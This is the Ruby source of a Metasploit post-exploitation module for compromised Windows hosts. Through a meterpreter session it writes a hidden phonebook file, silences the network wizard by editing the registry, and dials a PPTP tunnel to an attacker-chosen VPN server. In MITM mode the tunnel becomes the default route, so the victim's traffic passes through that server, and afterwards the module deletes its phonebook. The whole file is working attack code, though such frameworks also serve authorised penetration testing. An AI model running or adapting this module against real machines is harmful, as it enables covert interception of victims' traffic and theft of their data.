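##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Registry

  # Seconds allowed for the tunnel to come up when TIMEOUT is zero or negative.
  DEFAULT_TIMEOUT = 60

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Remote Point-to-Point Tunneling Protocol',
        'Description' => %q{
          This module initiates a PPTP connection to a remote machine (VPN server). Once
          the tunnel is created we can use it to force the victim traffic to go through the
          server getting a man in the middle attack. Be sure to allow forwarding and
          masquerading on the VPN server (mitm).
        },
        'License' => MSF_LICENSE,
        'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
        'References' => [
          [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]
        ],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [true, 'VPN Username.' ]),
        OptString.new('PASSWORD', [true, 'VPN Password.' ]),
        OptBool.new('MITM', [true, 'Man in the middle.', true]),
        OptInt.new('TIMEOUT', [true, 'Timeout for the tunnel creation.', 60]),
        OptString.new('PBK_NAME', [true, 'PhoneBook entry name.', 'MSF']),
        OptAddress.new('VPNHOST', [true, 'VPN server.'])
      ]
    )
  end

  # Module entry point: on Vista through Windows 7 SP1 the network wizard is
  # disabled first, then a temporary phonebook is written, dialled with
  # rasdial under a timeout, and removed again.
  #
  # @return [void]
  def run
    version = get_version_info
    disable_network_wizard if version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win7_SP1)

    pbk = create_pbk(datastore['MITM'], datastore['PBK_NAME'])
    # create_pbk returns nil when the phonebook could not be written; without
    # this guard rasdial would be pointed at a nil path and file_rm(nil) called.
    return unless pbk

    timeout = datastore['TIMEOUT'] <= 0 ? DEFAULT_TIMEOUT : datastore['TIMEOUT']
    begin
      ::Timeout.timeout(timeout) do
        run_rasdial(pbk, datastore['USERNAME'], datastore['PASSWORD'], datastore['VPNHOST'], datastore['PBK_NAME'])
      end
    rescue ::Timeout::Error
      print_error("Timeout after #{timeout} seconds")
    ensure
      # Remove the temporary phonebook even if rasdial raised something other
      # than a timeout, so the file is not left behind on the target.
      file_rm(pbk)
      print_status('Phonebook deleted')
    end
  end

  # Writes the NewNetworkWindowOff value under
  # HKLM\System\CurrentControlSet\Control\Network, which this module relies on
  # to keep the Windows network wizard from appearing when the new interface
  # comes up. Needs administrative privileges; the value is only written when
  # it is not already present, and registry errors are reported, not raised.
  #
  # @return [void]
  def disable_network_wizard
    unless is_admin?
      print_error("You don't have enough privileges to change the registry. Network Wizard will not be disabled")
      return
    end

    key = 'HKLM\\System\\CurrentControlSet\\Control\\Network'
    value = 'NewNetworkWindowOff'
    begin
      unless registry_getvaldata(key, value)
        registry_setvaldata(key, value, 3, 'REG_BINARY')
        print_good('Network Wizard disabled')
      end
    rescue StandardError => e
      print_status("The following error was encountered: #{e.class} #{e}")
    end
  end

  # Writes a minimal phonebook (.pbk) holding one entry to the target's
  # %TEMP% directory under a random file name.
  #
  # @param mim [Boolean] when false, IpPrioritizeRemote=0 is added so the
  #   remote end is not used as the default gateway; when true the line is
  #   omitted and the tunnel takes over the default route (the MITM case)
  # @param pbk_name [String] name of the phonebook entry
  # @return [String, nil] remote path of the phonebook, or nil if it could not be written
  def create_pbk(mim, pbk_name)
    # Build the path with interpolation rather than appending to the string
    # returned by expand_path, which mutated that object in place.
    pbk_file = "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(6..13)}.pbk"

    entry = ["[#{pbk_name}]", '', 'MEDIA=rastapi', 'Port=VPN4-0', 'DEVICE=vpn']
    entry << 'IpPrioritizeRemote=0' unless mim
    # Phonebook files use CRLF line endings; each line including the last is terminated.
    conf_conn = entry.join("\r\n") + "\r\n"

    unless write_file(pbk_file, conf_conn)
      print_error("Could not write PhoneBook configuration to #{pbk_file}")
      return nil
    end

    print_good("PhoneBook configuration written to #{pbk_file}")
    pbk_file
  end

  # Dials the phonebook entry with rasdial and reports success when the entry
  # name appears in rasdial's list of active connections afterwards.
  #
  # @param pbk [String] remote path of the phonebook written by create_pbk
  # @param user [String] VPN username
  # @param pass [String] VPN password
  # @param vpn_host [String] VPN server address
  # @param pbk_name [String] phonebook entry name
  # @return [void]
  def run_rasdial(pbk, user, pass, vpn_host, pbk_name)
    print_status('Establishing connection ...')
    # Tear down any existing RAS connection so the new dial starts clean.
    cmd_exec('rasdial', '/disconnect')
    # Note: the credentials are passed to rasdial as command-line arguments on the target.
    output_run = cmd_exec('rasdial', "#{pbk_name} #{user} #{pass} /PHONE:#{vpn_host} /PHONEBOOK:#{pbk}")
    # rasdial with no arguments lists the connections currently up.
    output_view = cmd_exec('rasdial', nil)

    # PBK_NAME is operator-supplied; escape it so regex metacharacters in the
    # entry name cannot break or widen the match.
    if output_view.match?(/#{Regexp.escape(pbk_name)}/i)
      print_good('Connection Successful')
    else
      print_error("Connection failure: #{output_run}")
    end
  end
end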